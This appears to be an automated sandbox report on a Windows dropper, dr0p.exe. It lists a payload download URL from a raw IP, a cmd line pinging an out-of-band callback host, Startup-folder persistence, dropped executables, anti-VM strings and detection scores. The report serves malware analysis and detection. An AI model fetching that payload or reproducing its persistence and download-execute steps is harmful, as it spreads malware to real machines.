Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\hm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hm.exe	Section loaded: opencl.dll	Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: chrome.lnk.3.dr

LNK file: ..\..\..\..\..\..\..\Desktop\mh1.exe

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

File written: C:\Users\user\Desktop\poolworker.config.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:

Source: dr0p.exe

Static PE information: 0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6005187

Jump to behavior

Source: mh.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1e04ab
Source: q.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x22ef6
Source: dr0p.exe	Static PE information: real checksum: 0xc3e77c5a should be: 0x5a1f
Source: hm.exe.3.dr	Static PE information: real checksum: 0x3f27e7 should be: 0x3edda5

Source: mh.exe.0.dr	Static PE information: section name: .didat
Source: mh.exe.0.dr	Static PE information: section name: _RDATA
Source: hm.exe.3.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ED5166 push rsi; retf		3_2_00007FF741ED5167
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ED5156 push rsi; retf		3_2_00007FF741ED5157

Source: C:\Users\user\Desktop\dr0p.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	File created: C:\Users\user\Desktop\hm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	File created: C:\Users\user\Desktop\q.exe	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Jump to dropped file

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk			Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EBB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	3_2_00007FF741EBB190
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EA40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	3_2_00007FF741EA40BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741ECFCA0 FindFirstFileExA,	3_2_00007FF741ECFCA0

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741EC16A4 VirtualQuery,GetSystemInfo,

3_2_00007FF741EC16A4

Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: dr0p.exe, 00000000.00000003.2154650025.0000000005883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dr0p.exe, 00000000.00000003.2154650025.0000000005883000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000002.2162499969.0000000005883000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000003.2154650025.000000000586C000.00000004.00000020.00020000.00000000.sdmp, dr0p.exe, 00000000.00000002.2162499969.000000000586C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dr0p.exe, 00000000.00000003.2154650025.00000000058A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD0o

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741EC3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00007FF741EC3170

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741ED0D20 GetProcessHeap,

3_2_00007FF741ED0D20

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF741EC3170
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF741EC2510
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC3354 SetUnhandledExceptionFilter,	3_2_00007FF741EC3354
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Code function: 3_2_00007FF741EC76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF741EC76D8

Source: C:\Users\user\Desktop\dr0p.exe

Code function: 0_2_00420000 LoadLibraryA,InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,ShellExecuteA,ShellExecuteA,exit,

0_2_00420000

Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dr0p.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	Process created: C:\Users\user\Desktop\q.exe "C:\Users\user\Desktop\q.exe" hm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun	Jump to behavior
Source: C:\Users\user\Desktop\q.exe	Process created: C:\Users\user\Desktop\hm.exe "C:\Users\user\Desktop\hm.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741ED58E0 cpuid

3_2_00007FF741ED58E0

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

3_2_00007FF741EBA2CC

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741EC0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

3_2_00007FF741EC0754

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

Code function: 3_2_00007FF741EA51A4 GetVersionExW,

3_2_00007FF741EA51A4

Remote Access Functionality

Found API chain with Download & Execute functionality

Source: C:\Users\user\Desktop\dr0p.exe

Download & Execute: InternetReadFile,WriteFile,ShellExecute

graph_0-43

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	12 Registry Run Keys / Startup Folder	1 Exploitation for Privilege Escalation	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	11 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Software Packing	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	21 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	4 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dr0p.exe	18%	Virustotal		Browse
dr0p.exe	24%	ReversingLabs	Win32.Trojan.Crysant
dr0p.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe	43%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\Desktop\hm.exe	29%	ReversingLabs	Win64.PUA.Generic
C:\Users\user\Desktop\q.exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://23.27.51.244/mh.exe/c	0%	Avira URL Cloud	safe
http://23.27.51.244/mh.exe	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://23.27.51.244/mh.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://23.27.51.244/mh.exe/c	dr0p.exe, 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.27.51.244	unknown	United States		18779	EGIHOSTINGUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584651
Start date and time:	2025-01-06 06:03:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dr0p.exe
Detection:	MAL
Classification:	mal72.troj.adwa.winEXE@14/6@0/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 93
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hm.exe, PID 5788 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:03:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
06:04:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EGIHOSTINGUS	armv6l.elf	Get hash	malicious	Unknown	Browse	136.0.151.194
	2.elf	Get hash	malicious	Unknown	Browse	107.164.241.37
	31.13.224.14-mips-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	192.177.167.92
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	166.88.83.119
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	104.253.169.92
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	45.38.212.251
	nabspc.elf	Get hash	malicious	Unknown	Browse	142.252.146.175
	arm7.elf	Get hash	malicious	Unknown	Browse	142.253.14.137
	arm.elf	Get hash	malicious	Unknown	Browse	45.39.118.81
	file.exe	Get hash	malicious	FormBook	Browse	45.38.60.47

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\Desktop\hm.exe	x11.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	778
Entropy (8bit):	3.112954459257533
Encrypted:	false
SSDEEP:	12:8wl0dRsX2lw/GXzUQe+gpbDEa4t2YZ/elFlSJm:8YTeIQel1DLqy
MD5:	B74F9BBD71D91F827484B532D81043B5
SHA1:	F050DAB19C664390E38DC40F3BD30A708AFF352D
SHA-256:	217F9930F97432CAD7283E0DE7B35D1AD6F95E7612FC4D9466E22CA1B56B33C9
SHA-512:	184C9B582689EDAF340D0FDDDFD2EABF68DDCE49FB220970B1B3F466EC4CA91226955B3507B44E0802DD355395B17848B02D350255F42D93879A909A46B091A1
Malicious:	false
Reputation:	low
